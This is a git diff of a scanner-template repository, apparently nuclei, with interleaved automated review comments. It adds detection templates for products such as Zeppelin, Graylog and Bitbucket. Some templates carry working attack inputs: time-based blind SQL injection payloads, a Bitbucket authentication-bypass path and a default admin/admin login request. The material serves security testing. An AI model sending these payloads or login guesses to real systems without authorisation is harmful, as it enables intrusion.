+./poc/upload/wp-gallery-file-upload.yaml ./poc/upload/wp-maximum-upload-file-size-55347e9ac58126992d50d45693e54288.yaml ./poc/upload/wp-maximum-upload-file-size-621a86ac69fc43f58c97e1a34ee9115f.yaml ./poc/upload/wp-maximum-upload-file-size-9288e4a0cabda289c3e3782d8a4f171e.yaml 
@@ -110578,6 +110748,7 @@ ./poc/upload/yonyou-nc-arbitrary-file-upload.yml ./poc/upload/yonyou-nc-cloud-Upload.yaml ./poc/upload/yonyou-nc-cloud-ncchr-attachment-uploadChunk-fileupload.yaml +./poc/upload/yonyou-nc-dispatcher-fileupload.yaml ./poc/upload/yonyou-nc-grouptemplet-fileupload.yaml ./poc/upload/yonyou-nc-servlet-upload-rce.yaml ./poc/upload/yonyou-nc-uploadfile-fileupload.yaml @@ -110821,6 +110992,7 @@ ./poc/web/catch-web-tools.yaml ./poc/web/chatgpt-web-unauth.yaml ./poc/web/chinatelecomequipmentwebconfigurationsystem.yaml +./poc/web/cisco-webex-log4j-rce.yaml ./poc/web/cisco-webex.yaml ./poc/web/cisco-webvpn-detect.yaml ./poc/web/citrix-web-pn-server.yaml @@ -110849,6 +111021,7 @@ ./poc/web/core-web-vitals-pagespeed-booster-c2e9c05d82abd78bc90a975254e47100.yaml ./poc/web/core-web-vitals-pagespeed-booster.yaml ./poc/web/custom-weblogic-SSRF-detect.yaml +./poc/web/cvsweb-detect.yaml ./poc/web/cwp-webpanel.yaml ./poc/web/cypress-web-config.yaml ./poc/web/dahua-web-panel.yaml @@ -110884,6 +111057,7 @@ ./poc/web/edusoho-open-source-web-classroom-.yaml ./poc/web/ehanced-webpack-sourcemap-disclosure.yaml ./poc/web/ehole-web-fingerprints.yaml +./poc/web/element-web-detect.yaml ./poc/web/embedthis-appweb.yaml ./poc/web/emc-documentum-webtop.yaml ./poc/web/emerson-xweb-evo.yaml @@ -116025,6 +116199,7 @@ ./poc/wordpress/wp-fusion-lite.yaml ./poc/wordpress/wp-gallery-exporter-3f1adc6ccbb78d095c27d60e9e3bd3d1.yaml ./poc/wordpress/wp-gallery-exporter.yaml +./poc/wordpress/wp-gallery-file-upload.yaml ./poc/wordpress/wp-gallery-metabox-fbec50dd3d7076cf144a2ff1fbe67890.yaml ./poc/wordpress/wp-gallery-metabox.yaml ./poc/wordpress/wp-gdpr-compliance-0170126c3142c8b176fd7f76634dae15.yaml 
@@ -117449,6 +117624,7 @@ ./poc/wordpress/wp-real-estate-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/wordpress/wp-real-estate-theme-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/wordpress/wp-real-estate-theme.yaml +./poc/wordpress/wp-real-estate-xss.yaml ./poc/wordpress/wp-real-estate.yaml ./poc/wordpress/wp-realty-13c9e77167bbc26d163b916b07cd1698.yaml ./poc/wordpress/wp-realty-2c80d9878e0e3a179c04b0f1bdbe1067.yaml @@ -117980,6 +118156,7 @@ ./poc/wordpress/wp-social-invitations.yaml ./poc/wordpress/wp-social-sharing-eda59f81748daf05c10fe49d04ee8954.yaml ./poc/wordpress/wp-social-sharing.yaml +./poc/wordpress/wp-social-warfare-rce.yaml ./poc/wordpress/wp-social-widget-99c69545759f5e9561e2866256c68f33.yaml ./poc/wordpress/wp-social-widget-d7b289a4844fbc5f1814a16ab030f4b4.yaml ./poc/wordpress/wp-social-widget.yaml @@ -118202,6 +118379,7 @@ ./poc/wordpress/wp-super-popup.yaml ./poc/wordpress/wp-superb-slideshow-45ba464412c6ae4b94e80349ccf8b660.yaml ./poc/wordpress/wp-superb-slideshow.yaml +./poc/wordpress/wp-superstorefinder-misconfig.yaml ./poc/wordpress/wp-support-plus-responsive-ticket-system-2914bb7bf5b0944969afa429d5685254.yaml ./poc/wordpress/wp-support-plus-responsive-ticket-system-3957ad8199faa976036a0ef47620fc07.yaml ./poc/wordpress/wp-support-plus-responsive-ticket-system-3b419b25534f982fad718594f4ceb7b3.yaml @@ -119811,6 +119989,7 @@ ./poc/xss/basic-xss-prober-698.yaml ./poc/xss/basic-xss-prober-699.yaml ./poc/xss/basic-xss-prober.yaml +./poc/xss/beyond-trust-xss.yaml ./poc/xss/bitrix-getmessage-xss.yaml ./poc/xss/bitrix-recalc-xss-galleries.yaml ./poc/xss/bitrix-xss.yaml @@ -119941,6 +120120,7 @@ ./poc/xss/java-melody-xss.yaml ./poc/xss/jenkins-audit-trail-xss.yaml ./poc/xss/jorani-benjamin-xss.yaml +./poc/xss/junos-xss.yaml ./poc/xss/kafdrop-xss-8411.yaml ./poc/xss/kafdrop-xss-8412.yaml ./poc/xss/kafdrop-xss-8413.yaml 
@@ -120034,6 +120214,7 @@ ./poc/xss/parentlink-xss-9467.yaml ./poc/xss/parentlink-xss.yaml ./poc/xss/photo-gallery-xss.yaml +./poc/xss/photoblocks-grid-gallery-xss.yaml ./poc/xss/php-timeclock-xss-9550.yaml ./poc/xss/php-timeclock-xss-9551.yaml ./poc/xss/php-timeclock-xss-9552.yaml @@ -120081,6 +120262,7 @@ ./poc/xss/sick-beard-xss-10234.yaml ./poc/xss/sick-beard-xss.yaml ./poc/xss/simple-xss.yaml +./poc/xss/sitecore-xml-xss.yaml ./poc/xss/siteminder-dom-based-xss.yaml ./poc/xss/siteminder-dom-xss.yaml ./poc/xss/slims-xss.yaml @@ -120221,6 +120403,7 @@ ./poc/xss/wp-plugin-marmoset-viewer-xss-11538.yaml ./poc/xss/wp-plugin-marmoset-viewer-xss.yaml ./poc/xss/wp-qwiz-online-xss.yaml +./poc/xss/wp-real-estate-xss.yaml ./poc/xss/wp-related-post-xss.yaml ./poc/xss/wp-securimage-xss-11556.yaml ./poc/xss/wp-securimage-xss-11557.yaml @@ -120257,6 +120440,7 @@ ./poc/xss/xss-fuzz.yaml ./poc/xss/xss-fuzz.yml ./poc/xss/xss-inside-tag-top-params.yaml +./poc/xss/xss-oracle.yaml ./poc/xss/xss-path.yaml ./poc/xss/xss-prober.yaml ./poc/xss/xss-rails-post.yaml diff --git a/poc/apache/apache-impala.yaml b/poc/apache/apache-impala.yaml index 0103db4544..1cd3977e36 100644 --- a/poc/apache/apache-impala.yaml +++ b/poc/apache/apache-impala.yaml @@ -4,6 +4,7 @@ info: name: Apache Impala - Exposure author: DhiyaneshDk severity: medium + description: Apache Impala is exposed. reference: - https://www.facebook.com/photo/?fbid=627585602745296&set=pcb.627585619411961 metadata: @@ -32,5 +33,4 @@ http: - type: status status: - 200 - -# digest: 4a0a004730450221009a2bb01334c3631544baac5fa27e43d8c6ef0d3840a1d8cc956d0cf32b7f15f2022022b76f87a33c3ccf12e54a3531009144fea1e30598d54a932fd1db0479d3146f:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502201dc3cd253eed22c678589452bebea6692552bfa91a81c9467c9a5a82f1f8ecdd022100e382474589312820dc0673ff200915a390c42824a0a4ee59a86114f1b7a800b5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
diff --git a/poc/apache/apache-zeppelin-unauth.yaml b/poc/apache/apache-zeppelin-unauth.yaml new file mode 100644 index 0000000000..674552db96 --- /dev/null +++ b/poc/apache/apache-zeppelin-unauth.yaml @@ -0,0 +1,45 @@ +id: apache-zeppelin-unauth + +info: + name: Apache Zeppelin - Unauthenticated Access + author: j4vaovo + severity: high + description: | + Apache Zeppelin server was able to be accessed because no authentication was required. + reference: | + - https://www.adminxe.com/2172.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L + cvss-score: 8.6 + cwe-id: CWE-285 + metadata: + verified: true + max-request: 1 + shodan-query: title:"Zeppelin" + fofa-query: title="Zeppelin" + tags: misconfig,apache,zeppelin,unauth + +http: + - method: GET + path: + - "{{BaseURL}}/api/security/ticket" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'status":"OK' + - '"ticket":"anonymous"' + condition: and + + - type: word + part: header + words: + - 'application/json' + + - type: status + status: + - 200 + +# digest: 4b0a00483046022100d19c5f3d615eed414c17a664909cb53f1ba0e1a99c7f6d297a1b7fb62a168baa022100ba595777c8c3a57f62dda3cdb38e4a0b8c03bec264faff87458b48fabd7c5dc0:922c64590222798bb761d5b6d8e72950 diff --git a/poc/apache/default-apache-shiro.yaml b/poc/apache/default-apache-shiro.yaml new file mode 100644 index 0000000000..259a94706c --- /dev/null +++ b/poc/apache/default-apache-shiro.yaml 
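Review bot: `reference: |` makes the reference a block-scalar string whose content is literally `- https://www.adminxe.com/2172.html`, not a one-item list as in the other templates of this commit; drop the `|` so it reads `reference:` followed by `- https://www.adminxe.com/2172.html` on the next line. The same file is added verbatim as poc/auth/apache-zeppelin-unauth.yaml in a later hunk, so the fix applies there too and both digests need regenerating. The body words `status":"OK` and `"ticket":"anonymous"` under `condition: and` are a sound signal that the server is answering without authentication; a description sentence stating that an anonymous ticket means Zeppelin is running with authentication disabled would make the finding actionable for the operator.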
@@ -0,0 +1,29 @@ +id: default-apache-shiro + +info: + name: Apache Shiro Default Page + author: DhiyaneshDK + severity: info + metadata: + verified: true + max-request: 1 + shodan-query: title:"Apache Shiro Quickstart" + tags: tech,apache,shiro + +http: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Apache Shiro Quickstart" + + - type: status + status: + - 200 + +# digest: 490a0046304402206679e43f4e2125fa6ab7f37680f2c0464b2b7251690168259de5ac9c1f18fb51022071a731cd2862bb734edb2e7491f15198961599fa7ed8cb84bfa49805b92df0f3:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/clickhouse-unauth-api.yaml b/poc/api/clickhouse-unauth-api.yaml index 8a8675129c..98f1a624df 100644 --- a/poc/api/clickhouse-unauth-api.yaml +++ b/poc/api/clickhouse-unauth-api.yaml @@ -4,6 +4,7 @@ info: name: ClickHouse API Database Interface - Improper Authorization author: DhiyaneshDk severity: high + description: Clickhouse API Database is exposed. reference: - https://github.com/luck-ying/Library-POC/blob/master/ClickHouse%E6%95%B0%E6%8D%AE%E5%BA%93/ClickHouse%E6%95%B0%E6%8D%AE%E5%BA%93%208123%E7%AB%AF%E5%8F%A3%E7%9A%84%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE.py - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/redteam/vulnerability/unauthorized/ClickHouse%208123%E7%AB%AF%E5%8F%A3.md?plain=1 @@ -12,7 +13,7 @@ info: max-request: 1 shodan-query: "X-ClickHouse-Summary" fofa-query: "X-ClickHouse-Summary" - tags: clickhouse,unauth,disclosure + tags: misconfig,clickhouse,unauth,disclosure http: - method: GET 
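Review bot: The `info` block has no `description`, while the apache-impala and clickhouse hunks in this same commit add one-line descriptions; add `description: Apache Shiro Quickstart default page is exposed.` under `severity`. The author is spelled `DhiyaneshDK` here but `DhiyaneshDk` in the other templates by the same author in this commit, which splits attribution when filtering by author. The matcher is a single exact title string, so a Quickstart page served under a customised title is missed — acceptable for an `info` tech-detect, but worth stating in the description.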
@@ -36,5 +37,4 @@ http: - type: status status: - 200 - -# digest: 490a00463044022036599550131f2de458fc72e772f69cae1e3aa73931f856c352ff8ebc85d72ac7022004567b098e2ae9a91cc1f46ed381cb9c41b904d4393b286fbc3cf77bd930d4ae:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100a0b5c453b540196a3297c18713c3638b6327d815009a24c1b054e31cd98ab0ab02203243446e5cb8801e67889a19c0c6dd4298a25228b1181c835f909574b5096336:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/api/discuz-api-pathinfo.yaml b/poc/api/discuz-api-pathinfo.yaml new file mode 100644 index 0000000000..9cd016e021 --- /dev/null +++ b/poc/api/discuz-api-pathinfo.yaml @@ -0,0 +1,41 @@ +id: discuz-api-pathinfo + +info: + name: Discuz! X2.5 - Path Disclosure + author: ritikchaddha + severity: low + description: Discuz! X2.5 api.php path disclosure vulnerability + reference: + - https://crx.xmspace.net/discuz_x25_api_php.html + - http://www.1314study.com/t/87417.html + metadata: + verified: true + max-request: 1 + shodan-query: title:"Discuz!" + fofa-query: title="Discuz!" + tags: discuz,info,disclosure + +http: + - method: GET + path: + - '{{BaseURL}}/api.php?mod[]=auto' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '.php on line' + - 'function.array' + condition: and + + - type: word + part: header + words: + - 'text/html' + + - type: status + status: + - 200 + +# digest: 4a0a0047304502202a08c3fa9304cacdc32c84c55e79263202268de3fd524bd2edc44d0a687648af022100b8d1d52d3b88bcf50cd5f659d3e59024543fa9e29086e2f1383aa904b46e2d68:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/graylog-api-exposure.yaml b/poc/api/graylog-api-exposure.yaml new file mode 100644 index 0000000000..62d08209c3 --- /dev/null +++ b/poc/api/graylog-api-exposure.yaml 
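Review bot: The discuz-api-pathinfo template reports a path disclosure but never captures the disclosed path, so the output only says that a PHP warning was rendered; a regex extractor with `part: body`, `group: 1` and the pattern `'in (\S+\.php) on line'` would surface the leaked filesystem path that remediation actually needs. The `.php on line` and `function.array` words are PHP warning output, which only appears when `display_errors` is enabled, so the description should say that disabling `display_errors` in production closes the issue regardless of the `mod[]` handling. The `text/html` header matcher adds little discrimination since that is the default content type for PHP pages.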
@@ -0,0 +1,91 @@ +id: graylog-api-exposure + +info: + name: Graylog REST API Endpoints - Exposure + author: Arqsz + severity: info + description: | + Graylog is a centralized log management solution. According to the official documentation, it exposes multiple endpoints (some by default). + reference: + - https://go2docs.graylog.org/5-0/setting_up_graylog/rest_api.html + - https://gist.github.com/asachs01/f1f317b2924a688deb8ed2520a4520bd + metadata: + verified: true + max-request: 50 + shodan-query: Graylog + tags: tech,graylog,api,swagger,fuzz + +http: + - method: GET + path: + - "{{BaseURL}}" + - "{{BaseURL}}/api/api-docs" + - "{{BaseURL}}/api/api-browser" + - "{{BaseURL}}/api/cluster" + - "{{BaseURL}}/api/dashboards" + - "{{BaseURL}}/api/events/definitions" + - "{{BaseURL}}/api/events/definitions/validate" + - "{{BaseURL}}/api/events/notifications/test" + - "{{BaseURL}}/api/events/search" + - "{{BaseURL}}/api/free-enterprise/license" + - "{{BaseURL}}/api/plugins/org.graylog.enterprise.integrations/office365/checkSubscriptions" + - "{{BaseURL}}/api/plugins/org.graylog.enterprise.integrations/office365/inputs" + - "{{BaseURL}}/api/plugins/org.graylog.enterprise.integrations/office365/startSubscription" + - "{{BaseURL}}/api/plugins/org.graylog.integrations/aws/cloudwatch/log_groups" + - "{{BaseURL}}/api/plugins/org.graylog.integrations/aws/inputs" + - "{{BaseURL}}/api/plugins/org.graylog.integrations/aws/kinesis/auto_setup/create_stream" + - "{{BaseURL}}/api/plugins/org.graylog.integrations/aws/kinesis/auto_setup/create_subscription" + - "{{BaseURL}}/api/plugins/org.graylog.integrations/aws/kinesis/auto_setup/create_subscription_policy" + - "{{BaseURL}}/api/plugins/org.graylog.integrations/aws/kinesis/health_check" + - "{{BaseURL}}/api/plugins/org.graylog.integrations/aws/kinesis/streams" + - "{{BaseURL}}/api/plugins/org.graylog.plugins.archive/archives/catalog/rebuild" + - "{{BaseURL}}/api/plugins/org.graylog.plugins.archive/backends" + - 
"{{BaseURL}}/api/plugins/org.graylog.plugins.archive/cluster/archives/catalog/rebuild" + - "{{BaseURL}}/api/plugins/org.graylog.plugins.collector/configurations" + - "{{BaseURL}}/api/plugins/org.graylog.plugins.license/licenses/verify" + - "{{BaseURL}}/api/plugins/org.graylog.plugins.report/reports" + - "{{BaseURL}}/api/plugins/org.graylog.plugins.security/team-sync/test/backend" + - "{{BaseURL}}/api/plugins/org.graylog.plugins.security/teams" + - "{{BaseURL}}/api/scheduler/jobs" + - "{{BaseURL}}/api/system/authentication/services/backends" + - "{{BaseURL}}/api/system/authentication/services/test/backend/connection" + - "{{BaseURL}}/api/system/authentication/services/test/backend/login" + - "{{BaseURL}}/api/system" + - "{{BaseURL}}/api/system/content_packs" + - "{{BaseURL}}/api/system/indexer/cluster/health" + - "{{BaseURL}}/api/system/indexer/cluster/name" + - "{{BaseURL}}/api/system/debug/events/cluster" + - "{{BaseURL}}/api/system/debug/events/local" + - "{{BaseURL}}/api/system/jobs" + - "{{BaseURL}}/api/system/pipelines/pipeline" + - "{{BaseURL}}/api/system/pipelines/rule" + - "{{BaseURL}}/api/system/urlwhitelist/check" + - "{{BaseURL}}/api/system/urlwhitelist/generate_regex" + - "{{BaseURL}}/api/views" + - "{{BaseURL}}/api/views/fields" + - "{{BaseURL}}/api/views/forValue" + - "{{BaseURL}}/api/views/search/messages" + - "{{BaseURL}}/api/views/search/metadata" + - "{{BaseURL}}/api/views/search/sync" + - "{{BaseURL}}/api/users" + + host-redirects: true + stop-at-first-match: true + + matchers-condition: or + matchers: + - type: dsl + dsl: + - "status_code == 200" + - "contains_any(header, 'X-Graylog-Node-Id', 'Graylog', 'graylog')" + - "contains_any(body, 'X-Graylog-Node-Id', 'Graylog', 'graylog')" + - "contains_any(body, 'swagger')" + condition: and + + - type: dsl + name: unauthorized-graylog-header + dsl: + - "status_code == 401" + - "contains(header, 'X-Graylog-Node-Id') || contains(header, 'Graylog Server')" + condition: and +# digest: 
4b0a00483046022100cfdfa42b1d6eceea7948a44eebd55448c0553992200628d09080452422232dd7022100a11fdf4e1c293d3669c0923ed6177f2192e0ac22ff1af23651878299747ad7e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/api/seafile-api.yaml b/poc/api/seafile-api.yaml new file mode 100644 index 0000000000..6720c62a6f --- /dev/null +++ b/poc/api/seafile-api.yaml @@ -0,0 +1,49 @@ +id: seafile-api + +info: + name: Seafile API - Detect + author: righettod + severity: info + description: | + Seafile API was detected. + reference: + - https://download.seafile.com/published/web-api/home.md + - https://manual.seafile.com/ + - https://www.seafile.com/en/home/ + metadata: + verified: true + max-request: 1 + shodan-query: http.html:"seafile" + tags: exposure,api,detect + +http: + - method: GET + path: + - '{{BaseURL}}/api2/server-info/' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'seafile-basic' + - 'seafile-pro' + condition: or + + - type: word + part: header + words: + - 'application/json' + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + group: 1 + regex: + - '"version":\s*"([0-9.]+)"' + +# digest: 4a0a00473045022100c47c1ae5d724d7b5a58f902d8807a9c455951aea612d75bae34e5f0b5fbf0d5f022004cbf64a4224a7d86c861b15ee1983a7b9a0d5ea80efc59b92ff61adb2cc285d:922c64590222798bb761d5b6d8e72950 diff --git a/poc/atlassian/bamboo-detect.yaml b/poc/atlassian/bamboo-detect.yaml new file mode 100644 index 0000000000..b4cf9aa185 --- /dev/null +++ b/poc/atlassian/bamboo-detect.yaml 
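Review bot: The second matcher, `unauthorized-graylog-header`, turns a 401 from any of the 50 paths into a finding, but a 401 on `/api/users` or `/api/system` means authentication is enforced, which is the expected state rather than an exposure; because the first matcher is unnamed, the two outcomes are only distinguishable by whether a matcher name appears in the output. Give the first matcher a name as well, e.g. `name: unauthenticated-graylog-api`, and state in `description` that the 401 match means the API is reachable but protected. Several listed paths are named for mutating operations (`.../aws/kinesis/auto_setup/create_stream`, `.../office365/startSubscription`, `.../archives/catalog/rebuild`); requested with GET they most likely return 405 and contribute nothing to detection while inflating `max-request` to 50, so dropping them would make the probe quieter on production systems.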
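Review bot: `tags: exposure,api,detect` in seafile-api.yaml carries no product tag, whereas every other template in this commit tags the product (`zeppelin`, `shiro`, `clickhouse`, `graylog`), so a `-tags seafile` run would skip it; change it to `tags: exposure,api,detect,seafile`. The version extractor is the useful part of a server-info probe; the description could add that `/api2/server-info/` appears to be unauthenticated by design per the linked API documentation, so the finding is informational unless the extracted version is out of support.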
@@ -0,0 +1,35 @@ +id: bamboo-detect + +info: + name: Bamboo - Detection + author: bhutch + severity: info + description: | + Detect the presence of Bamboo, a CI/CD tool. + metadata: + verified: true + max-request: 1 + vendor: atlassian + shodan-query: http.favicon.hash:-1379982221 + category: devops + tags: tech,bamboo,atlassian,detect,cicd + +http: + - method: GET + path: + - "{{BaseURL}}" + + redirects: true + matchers: + - type: dsl + dsl: + - contains(to_lower(body), "log into atlassian - atlassian bamboo") + - contains(to_lower(body), "meta name=\"application-name\" content=\"bamboo\" />") + + extractors: + - type: regex + name: version + group: 1 + regex: + - '(?i)atlassian bamboo version (.*) -' +# digest: 490a00463044022054fee6be26df8b05fe917fc020a1087009848dc48a25b2df27954e6f1d71ac4802205b3267d31138e786117de003787658c20c23a8956efe95880a085e183df4ab62:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/atlassian/bitbucket-auth-bypass.yaml b/poc/atlassian/bitbucket-auth-bypass.yaml new file mode 100644 index 0000000000..8f98292c01 --- /dev/null +++ b/poc/atlassian/bitbucket-auth-bypass.yaml @@ -0,0 +1,36 @@ +id: bitbucket-auth-bypass + +info: + name: Bitbucket Server > 4.8 - Authentication Bypass + author: DhiyaneshDk + severity: critical + description: | + There is a permission bypass vulnerability through %20, which allows arbitrary users to obtain sensitive data + reference: + - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/Atlassian%20Bitbucket%20%E7%99%BB%E5%BD%95%E7%BB%95%E8%BF%87%E6%BC%8F%E6%B4%9E.md + metadata: + verified: true + max-request: 1 + shodan-query: title:"Log in - Bitbucket" + fofa-query: title="Log in - Bitbucket" + tags: misconfig,atlassian,bitbucket,auth-bypass + +http: + - method: GET + path: + - "{{BaseURL}}/admin%20/db" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "
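Review bot: The version extractor `'(?i)atlassian bamboo version (.*) -'` uses a greedy group, so if the footer text contains more than one ` -` the capture runs to the last one and the reported version carries trailing text; `'(?i)atlassian bamboo version (.*?) -'` or restricting the group to `([\d.]+)` keeps it to the version itself. The two `dsl` expressions under `matchers` carry no `condition`, so they are OR-ed by nuclei's default; writing `condition: or` explicitly makes the intent readable without knowing the default. The `info` block has a `description` but no `reference`, which the other detect templates in this commit include.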

Database

" + - "Migrate database" + condition: and + + - type: status + status: + - 200 + +# digest: 4a0a0047304502201946e48b08668a0597ded653e54bb13c9963cbdb12f6346ec925a3e6e076ed1b022100a2f3c87d0283a2d813f657de5284441fcb2c45757e5892bac85dee2fbec0a7ed:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/BlindSQLAuth.yaml b/poc/auth/BlindSQLAuth.yaml index 6fd8c3c79a..695dccaf08 100644 --- a/poc/auth/BlindSQLAuth.yaml +++ b/poc/auth/BlindSQLAuth.yaml @@ -1,7 +1,7 @@ id: time-based-sqli info: name: Time-Based Blind SQL Injection - author: Coffinxp/lostsec + author: Rzizah github.com/rzizah severity: Critical description: Detects time-based blind SQL injection vulnerability http: @@ -11,12 +11,8 @@ http: payloads: injection: - "(SELECT(0)FROM(SELECT(SLEEP(7)))a)" - - "'%2b(select*from(select(sleep(7)))a)%2b'" - "'XOR(SELECT(0)FROM(SELECT(SLEEP(7)))a)XOR'Z" - - "'XOR(if((select now()=sysdate()),sleep(7),0))XOR'Z" - - "X'XOR(if(now()=sysdate(),/**/sleep(7)/**/,0))XOR'X" - "' AND (SELECT 4800 FROM (SELECT(SLEEP(7)))HoBG)--" - - "X'XOR(if(now()=sysdate(),(sleep((((7))))),0))XOR'X" - "if(now()=sysdate(),SLEEP(7),0)" - "'XOR(if(now()=sysdate(),SLEEP(7),0))XOR'Z" - "'XOR(SELECT CASE WHEN(1234=1234) THEN SLEEP(7) ELSE 0 END)XOR'Z" diff --git a/poc/auth/Devias-kit-register.yaml b/poc/auth/Devias-kit-register.yaml new file mode 100644 index 0000000000..ecd05a3fe3 --- /dev/null +++ b/poc/auth/Devias-kit-register.yaml @@ -0,0 +1,25 @@ +id: Devias-kit-register + +info: + name: Devias-kit-register + author: 111xnagashy + description: registeration is opened for admin dashboard for Devias Kit PRO v6.1.0 + severity: critical + tags: register ,critical ,admin ,dashboard + +requests: + - method: GET + path: + - "{{BaseURL}}/auth/jwt/register" + - "{{BaseURL}}/auth-demo/register/classic" + - "{{BaseURL}}/auth-demo/register/modern" + redirects: false + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Terms and Conditions" + - type: status + status: + - 200 
diff --git a/poc/auth/Mantis-Default_login.yaml b/poc/auth/Mantis-Default_login.yaml index 9a5d0f2295..58cb63c201 100644 --- a/poc/auth/Mantis-Default_login.yaml +++ b/poc/auth/Mantis-Default_login.yaml @@ -6,12 +6,12 @@ info: description: A MantisBT default admin login was discovered. reference: - https://mantisbt.org/ + metadata: + shodan-query: title:"MantisBT" classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 - metadata: - shodan-query: title:"MantisBT" tags: mantisbt,default-login requests: - raw: diff --git a/poc/auth/apache-zeppelin-unauth.yaml b/poc/auth/apache-zeppelin-unauth.yaml new file mode 100644 index 0000000000..674552db96 --- /dev/null +++ b/poc/auth/apache-zeppelin-unauth.yaml @@ -0,0 +1,45 @@ +id: apache-zeppelin-unauth + +info: + name: Apache Zeppelin - Unauthenticated Access + author: j4vaovo + severity: high + description: | + Apache Zeppelin server was able to be accessed because no authentication was required. + reference: | + - https://www.adminxe.com/2172.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L + cvss-score: 8.6 + cwe-id: CWE-285 + metadata: + verified: true + max-request: 1 + shodan-query: title:"Zeppelin" + fofa-query: title="Zeppelin" + tags: misconfig,apache,zeppelin,unauth + +http: + - method: GET + path: + - "{{BaseURL}}/api/security/ticket" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'status":"OK' + - '"ticket":"anonymous"' + condition: and + + - type: word + part: header + words: + - 'application/json' + + - type: status + status: + - 200 + +# digest: 4b0a00483046022100d19c5f3d615eed414c17a664909cb53f1ba0e1a99c7f6d297a1b7fb62a168baa022100ba595777c8c3a57f62dda3cdb38e4a0b8c03bec264faff87458b48fabd7c5dc0:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/bitbucket-auth-bypass.yaml b/poc/auth/bitbucket-auth-bypass.yaml new file mode 100644 index 0000000000..8f98292c01 --- /dev/null 
+++ b/poc/auth/bitbucket-auth-bypass.yaml @@ -0,0 +1,36 @@ +id: bitbucket-auth-bypass + +info: + name: Bitbucket Server > 4.8 - Authentication Bypass + author: DhiyaneshDk + severity: critical + description: | + There is a permission bypass vulnerability through %20, which allows arbitrary users to obtain sensitive data + reference: + - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/Atlassian%20Bitbucket%20%E7%99%BB%E5%BD%95%E7%BB%95%E8%BF%87%E6%BC%8F%E6%B4%9E.md + metadata: + verified: true + max-request: 1 + shodan-query: title:"Log in - Bitbucket" + fofa-query: title="Log in - Bitbucket" + tags: misconfig,atlassian,bitbucket,auth-bypass + +http: + - method: GET + path: + - "{{BaseURL}}/admin%20/db" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "

Database

" + - "Migrate database" + condition: and + + - type: status + status: + - 200 + +# digest: 4a0a0047304502201946e48b08668a0597ded653e54bb13c9963cbdb12f6346ec925a3e6e076ed1b022100a2f3c87d0283a2d813f657de5284441fcb2c45757e5892bac85dee2fbec0a7ed:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/bloofoxcms-default-login.yaml b/poc/auth/bloofoxcms-default-login.yaml new file mode 100644 index 0000000000..94317594f5 --- /dev/null +++ b/poc/auth/bloofoxcms-default-login.yaml @@ -0,0 +1,42 @@ +id: bloofoxcms-default-login + +info: + name: bloofoxCMS - Default Login + author: theamanrawat + severity: high + description: | + bloofoxCMS contains default credentials. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations. + reference: + - https://www.bloofox.com/automated_setup.113.html + - https://www.bloofox.com + metadata: + verified: "true" + max-request: 1 + fofa-query: "Powered by bloofoxCMS" + tags: bloofox,cms,default-login + +http: + - raw: + - | + POST /admin/index.php HTTP/2 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + username={{username}}&password={{password}}&action=login + + attack: pitchfork + payloads: + username: + - "admin" + password: + - "admin" + redirects: true + max-redirects: 2 + matchers: + - type: dsl + dsl: + - contains(body, 'bloofoxCMS Admincenter') + - status_code == 200 + condition: and + +# digest: 4b0a00483046022100b9ba4676dd13debd11f72527dcd0e4bc7cd120efb61658f9e7270fe85c3b9b9b022100d82c3493478c008849f179f16de4746febc9b91f6ee3c1bbadcff8652341c03f:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/casdoor-users-password.yaml b/poc/auth/casdoor-users-password.yaml index 5fb953b17f..1359e2b5f9 100644 --- a/poc/auth/casdoor-users-password.yaml +++ b/poc/auth/casdoor-users-password.yaml 
@@ -4,6 +4,7 @@ info:
 name: Casdoor get-users Account Password Disclosure
 author: DhiyaneshDk
 severity: high
+ description: Casdoor get-users Account Password is exposed.
 reference:
 - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/Casbin%20get-users%20%E8%B4%A6%E5%8F%B7%E5%AF%86%E7%A0%81%E6%B3%84%E6%BC%8F%E6%BC%8F%E6%B4%9E.md?plain=1
 - https://github.com/qingchenhh/qc_poc/blob/main/Goby/Casbin_get_users.go
@@ -35,5 +36,4 @@ http:
 - type: status
 status:
 - 200
-
